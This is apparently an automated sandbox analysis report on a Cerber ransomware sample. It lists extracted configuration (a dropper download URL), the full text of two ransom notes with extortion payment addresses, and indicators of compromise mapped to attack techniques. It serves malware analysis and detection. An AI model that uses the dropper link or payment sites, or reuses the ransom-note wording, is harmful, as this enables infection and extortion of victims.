cerber | hxxps://github[.]com/kh4sh3i/Ransomware-Samples/archive/refs/heads/main[.]zip

Analysis

max time kernel
458s
max time network
463s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
04-08-2024 17:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/kh4sh3i/Ransomware-Samples/archive/refs/heads/main.zip

Score

10^/10

cerber discovery evasion execution persistence privilege_escalation ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://french-cooking.com/myguy.exe

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___EH54_.hta

Family

cerber

Ransom Note

<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>CERBER RANSOMWARE: Instructions</title> <HTA:APPLICATION APPLICATIONNAME="09Bz3" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style type="text/css"> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 13pt; line-height: 19pt; } body, h1 { margin: 0; padding: 0; } hr { color: #bda; height: 2pt; margin: 1.5%; } h1 { color: #555; font-size: 14pt; } ol { padding-left: 2.5%; } ol li { padding-bottom: 13pt; } small { color: #555; font-size: 11pt; } ul { list-style-type: none; margin: 0; padding: 0; } .button { color: #04a; cursor: pointer; } .button:hover { text-decoration: underline; } .container { background-color: #fff; border: 2pt solid #c7c7c7; margin: 5%; min-width: 850px; padding: 2.5%; } .header { border-bottom: 2pt solid #c7c7c7; margin-bottom: 2.5%; padding-bottom: 2.5%; } .h { display: none; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .info { background-color: #efe; border: 2pt solid #bda; display: inline-block; padding: 1.5%; text-align: center; } .updating { color: red; display: none; padding-left: 35px; background: url("data:image/gif;base64,R0lGODlhGQAZAKIEAMzMzJmZmTMzM2ZmZgAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQFAAAEACwAAAAAGQAZAAADVki63P4wSEiZvLXemRf4yhYoQ0l9aMiVLISCDms+L/DIwwnfc+c3qZ9g6Hn5hkhF7YgUKI2dpvNpExJ/WKquSoMCvd9geDeuBpcuGFrcQWep5Df7jU0AACH5BAUAAAQALAoAAQAOABQAAAMwSLDU/iu+Gdl0FbTAqeXg5YCdSJCBuZVqKw5wC8/qHJv2IN+uKvytn9AnFBCHx0cCACH5BAUAAAQALAoABAAOABQAAAMzSLoEzrC5F9Wk9YK6Jv8gEYzgaH4myaVBqYbfIINyHdcDI+wKniu7YG+2CPI4RgFI+EkAACH5BAUAAAQALAQACgAUAA4AAAMzSLrcBNDJBeuUNd6WwXbWtwnkFZwMqUpnu6il06IKLChDrsxBGufAHW0C1IlwxeMieEkAACH5BAUAAAQALAEACgAUAA4AAAM0SLLU/lAtFquctk6aIe5gGA1kBpwPqVZn66hl1KINPDRB3sxAGufAHc0C1IkIxcARZ4QkAAAh+QQFAAAEACwBAAQADgAUAAADMUhK0vurSfiko8oKHC//yyCCYvmVI4cOZAq+UCCDcv3VM4cHCuDHOZ/wI/xxigDQMAEAIfkEBQAABAAsAQABAA4AFAAAAzNIuizOkLgZ13xraHVF1puEKWBYlUP1pWrLBLALz+0cq3Yg324PAUAXcNgaBlVGgPAISQAAIfkEBQAABAAsAQABABQADgAAAzRIujzOMBJHpaXPksAVHoogMlzpZWK6lF2UjgobSK9AtjSs7QTg8xCfELgQ/og9I1IxXCYAADs=") left no-repeat; } #change_language { float: right; } #change_language, #texts div { display: none; } </style> </head> <body> <div class="container"> <div class="header"> <a id="change_language" href="#" onclick="return changeLanguage1();" title="English">☑ English</a> <h1>CERBER RANSOMWARE</h1> Instructions </div> <div id="languages"> ☑ Select your language <ul> <li><a href="#" title="English" onclick="return sh_bl('en');">English</a></li> <li><a href="#" title="Arabic" onclick="return sh_bl('ar');">العربية</a></li> <li><a href="#" title="Chinese" onclick="return sh_bl('zh');">中文</a></li> <li><a href="#" title="Dutch" onclick="return sh_bl('nl');">Nederlands</a></li> <li><a href="#" title="French" onclick="return sh_bl('fr');">Français</a></li> <li><a href="#" title="German" onclick="return sh_bl('de');">Deutsch</a></li> <li><a href="#" title="Italian" onclick="return sh_bl('it');">Italiano</a></li> <li><a href="#" title="Japanese" onclick="return sh_bl('ja');">日本語</a></li> <li><a href="#" title="Korean" onclick="return sh_bl('ko');">한국어</a></li> <li><a href="#" title="Polish" onclick="return sh_bl('pl');">Polski</a></li> <li><a href="#" title="Portuguese" onclick="return sh_bl('pt');">Português</a></li> <li><a href="#" title="Spanish" onclick="return sh_bl('es');">Español</a></li> <li><a href="#" title="Turkish" onclick="return sh_bl('tr');">Türkçe</a></li> </ul> </div> <div id="texts"> <div id="en"> Can't yopUmu find the necessary files? Is the cnSKHv1ontent of your files not readable? It is normal be3VRjABYPcause the files' names and the data in your files have been encrypeYMted by "CeeJJL6RErber Ransomware". It me34kWhUA8uans your files are NOT damageSN0d! Your files are modified only. This modification is reversible. FGK3CByrom now it is not possuSible to use your files until they will be decrypted. The only way to deci2T9SjZPsrypt your files safely is to buy the special decryption software "Cg6bzsOmGerber Decryptor". Any attempts to restrU77ore your files with the thirQDoOPIAZxd-party software will be fatal for your files! <hr> You can proczGErAYeed with purchasing of the decryption softwy9VxFFare at your personal page: PleHqBZlhXlase wait...<a class="url" href="http://p27dokhpz2n7nvgr.12hygy.top/C92F-DACA-992F-0446-9C3F" target="_blank">http://p27dokhpz2n7nvgr.12hygy.top/C92F-DACA-992F-0446-9C3F</a><hr><a href="http://p27dokhpz2n7nvgr.14ewqv.top/C92F-DACA-992F-0446-9C3F" target="_blank">http://p27dokhpz2n7nvgr.14ewqv.top/C92F-DACA-992F-0446-9C3F</a><hr><a href="http://p27dokhpz2n7nvgr.14vvrc.top/C92F-DACA-992F-0446-9C3F" target="_blank">http://p27dokhpz2n7nvgr.14vvrc.top/C92F-DACA-992F-0446-9C3F</a><hr><a href="http://p27dokhpz2n7nvgr.129p1t.top/C92F-DACA-992F-0446-9C3F" target="_blank">http://p27dokhpz2n7nvgr.129p1t.top/C92F-DACA-992F-0446-9C3F</a><hr><a href="http://p27dokhpz2n7nvgr.1apgrn.top/C92F-DACA-992F-0446-9C3F" target="_blank">http://p27dokhpz2n7nvgr.1apgrn.top/C92F-DACA-992F-0446-9C3F</a> If tI6dmhis page cannot be opened  clixqbAeLck here  to get a new addrxess of your personal page. If the addreVybDsRjss of your personal page is the same as befo1U6re after you tried to get a new one, you cN7Y6M4an try to get a new address in one hour. At thkXeis page you will receive the complete instrjzA1rKsCtGuctions how to buy the decryptioS2on software for restoring all your files. Also at this page you will be able to resQ6Tzntuq6vtore any one file for free to be sure "Cerbecir Decryptor" will help you. <hr> If your perkxxsonal page is not availaZable for a long period there is another way to open your personal page - instaM7WXAllation and use of Tor Browser: <ol> <li>run your InteSZF05Irnet browser (if you do not know what it is run the Internet Explorer);</li> <li>ent2fwB3v6k7er or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loadYbAing;</li> <li>on the site you will be offered to dosKHwnload Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>ruhOvaa8I3n Tor Browser;</li> <li>connect with the butt2MBR8PVion "Connect" (if you use the English version);</li> <li>a normal Internet broviEiSBwser window will be opened after the initialization;</li> <li>type or copy the addjbQress http://p27dokhpz2n7nvgr.onion/C92F-DACA-992F-0446-9C3F in this browser address bar;</li> <li>preuVljss ENTER;</li> <li>the site shoxEB6djAJuld be loaded; if for some reason the site is not lo4t4ZKtMxading wait for a moment and try again.</li> </ol> If you have any prTmpZN6Zkfkoblems during installation or use of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searcsIlDbVM77Vh bar "Install Tor Browser Windows" and you will find a lot of training videos about Tor Browser installation and use. <hr> Addit7Cb5eYional information: You will fio9i8WWZnd the instruhzctions ("*_READ_THIS_FILE_*.hta") for rexGCstoring your files in any fzT85vQdolder with your encLDxSTrypted files. The instr10eLxv1uctions "*_READ_THIS_FILE_*.hta" in the ftq0I2i2Z8DolderMhUc3TIX5hs with your encry6pted files are not virdAWHuquses! The instrucLVlVyQGtions "*_READ_THIS_FILE_*.hta" will heWnlp you to decH9rypt your files. Remembe12fYsWV9QCr! The worst siqBtuation already happZened and now the future of your files deVpends on your determaSMNPSination and speed of your actions. </div> <div id="ar" style="direction: rtl;"> لا يمكنك العثور على الملفات الضرورية؟ هل محتوى الملفات غير قابل للقراءة؟ هذا أمر طبيعي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cerber Ransomware". وهذا يعني أن الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا. ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها. الطريقة الوحيدة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cerber Decryptor". إن أية محاولات لاستعادة الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك! <hr> يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية: أرجو الإنتظار...<a class="url" href="http://p27dokhpz2n7nvgr.12hygy.top/C92F-DACA-992F-0446-9C3F" target="_blank">http://p27dokhpz2n7nvgr.12hygy.top/C92F-DACA-992F-0446-9C3F</a><hr><a href="http://p27dokhpz2n7nvgr.14ewqv.top/C92F-DACA-992F-0446-9C3F" target="_blank">http://p27dokhpz2n7nvgr.14ewqv.top/C92F-DACA-992F-0446-9C3F</a><hr><a href="http://p27dokhpz2n7nvgr.14vvrc.top/C92F-DACA-992F-0446-9C3F" target="_blank">http://p27dokhpz2n7nvgr.14vvrc.top/C92F-DACA-992F-0446-9C3F</a><hr><a href="http://p27dokhpz2n7nvgr.129p1t.top/C92F-DACA-992F-0446-9C3F" target="_blank">http://p27dokhpz2n7nvgr.129p1t.top/C92F-DACA-992F-0446-9C3F</a><hr><a href="http://p27dokhpz2n7nvgr.1apgrn.top/C92F-DACA-992F-0446-9C3F" target="_blank">http://p27dokhpz2n7nvgr.1apgrn.top/C92F-DACA-992F-0446-9C3F</a> في حالة تعذر فتح هذه الصفحة  انقر هنا  لإنشاء عنوان جديد لصفحتك الشخصية. في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك. في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cerber Decryptor" سوف يساعدك. <hr> إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor: <ol> <li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li> <li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li> <li>انتظر لتحميل الموقع;</li> <li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li> <li>قم بتشغيل متصفح Tor;</li> <li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li> <li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li> <li>قم بكتابة أو نسخ العنوان http://p27dokhpz2n7nvgr.onion/C92F-DACA-992F-0446-9C3F في شريط العنوان في المتصفح;</li> <li>اضغط ENTER;</li> <li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li> </ol> إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه. <hr> معلومات إض9BpcKjbzCrافية: سGUوف تجد إرشادات استعادة الملفات الخاصة بك ("*_READ_THIS_FILE_*") في أي مجلد مع ملفاتك المشفرة. الإرشtTJWIgqادات ("*_READ_THIS_FILE_*") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*_READ_THIS_FILE_*") سوف تساعدك على فك تشفير الملفات الخاصة بك. تذكر أن أسوأ موQzM4iZLdقف قد حدث بالفعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك. </div> <div id="zh"> 您找不到所需的文件？ 您文件的内容无法阅读？ 这是正常的，因为您文件的文件名和数据已经被“Cerber Ransomware”加密了。 这意味着您的文件并没有损坏！您的文件只是被修改

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___JLFC_.txt

Family

cerber

Ransom Note

CERBER RANSOMWARE ----- YOUR DOCUMENTS, PH0TOS, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only way to decrypt y0ur files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_READ_THIS_FILE_*) with complete instructions how to decrypt your files. If you cannot find any (*_READ_THIS_FILE_*) file at your PC, follow the instructions below: ----- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://p27dokhpz2n7nvgr.onion/C92F-DACA-992F-0446-9C3F Note! This page is available via "Tor Browser" only. ----- Also you can use temporary addresses on your personal page without using "Tor Browser". ----- 1. http://p27dokhpz2n7nvgr.12hygy.top/C92F-DACA-992F-0446-9C3F 2. http://p27dokhpz2n7nvgr.14ewqv.top/C92F-DACA-992F-0446-9C3F 3. http://p27dokhpz2n7nvgr.14vvrc.top/C92F-DACA-992F-0446-9C3F 4. http://p27dokhpz2n7nvgr.129p1t.top/C92F-DACA-992F-0446-9C3F 5. http://p27dokhpz2n7nvgr.1apgrn.top/C92F-DACA-992F-0446-9C3F ----- Note! These are temporary addresses! They will be available for a limited amount of time! -----

URLs

http://p27dokhpz2n7nvgr.onion/C92F-DACA-992F-0446-9C3F

http://p27dokhpz2n7nvgr.12hygy.top/C92F-DACA-992F-0446-9C3F

http://p27dokhpz2n7nvgr.14ewqv.top/C92F-DACA-992F-0446-9C3F

http://p27dokhpz2n7nvgr.14vvrc.top/C92F-DACA-992F-0446-9C3F

http://p27dokhpz2n7nvgr.129p1t.top/C92F-DACA-992F-0446-9C3F

http://p27dokhpz2n7nvgr.1apgrn.top/C92F-DACA-992F-0446-9C3F

Signatures

Cerber
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
ransomware cerber

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2830	1584	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1584	powershell.exe

Contacts a large (1109) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4540	netsh.exe
1628	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\word\startup\	cerber.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk	svchost.exe

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File created	C:\Windows\assembly\Desktop.ini	svchost.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	svchost.exe

Drops file in System32 directory 38 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat!	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\documents	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\desktop	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat!	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office	cerber.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp85B7.bmp"	cerber.exe

Drops file in Program Files directory 20 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files (x86)\excel	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft sql server	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\office	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\program files (x86)\onenote	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\outlook	cerber.exe
File opened for modification	\??\c:\program files (x86)\office	cerber.exe
File opened for modification	\??\c:\program files (x86)\thunderbird	cerber.exe
File opened for modification	\??\c:\program files (x86)\word	cerber.exe
File opened for modification	\??\c:\program files (x86)\	cerber.exe
File opened for modification	\??\c:\program files (x86)\bitcoin	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\excel	cerber.exe
File opened for modification	\??\c:\program files (x86)\outlook	cerber.exe
File opened for modification	\??\c:\program files (x86)\powerpoint	cerber.exe
File opened for modification	\??\c:\program files (x86)\the bat!	cerber.exe
File opened for modification	\??\c:\program files\	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\word	cerber.exe
File opened for modification	\??\c:\program files (x86)\steam	cerber.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\documents	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\steam	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\the bat!	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat!	cerber.exe
File opened for modification	C:\Windows\assembly	svchost.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\outlook	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam	cerber.exe
File created	C:\Windows\assembly\Desktop.ini	svchost.exe
File opened for modification	\??\c:\windows\	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat!	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\documents	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\desktop	cerber.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	svchost.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat!	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\desktop	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server	cerber.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
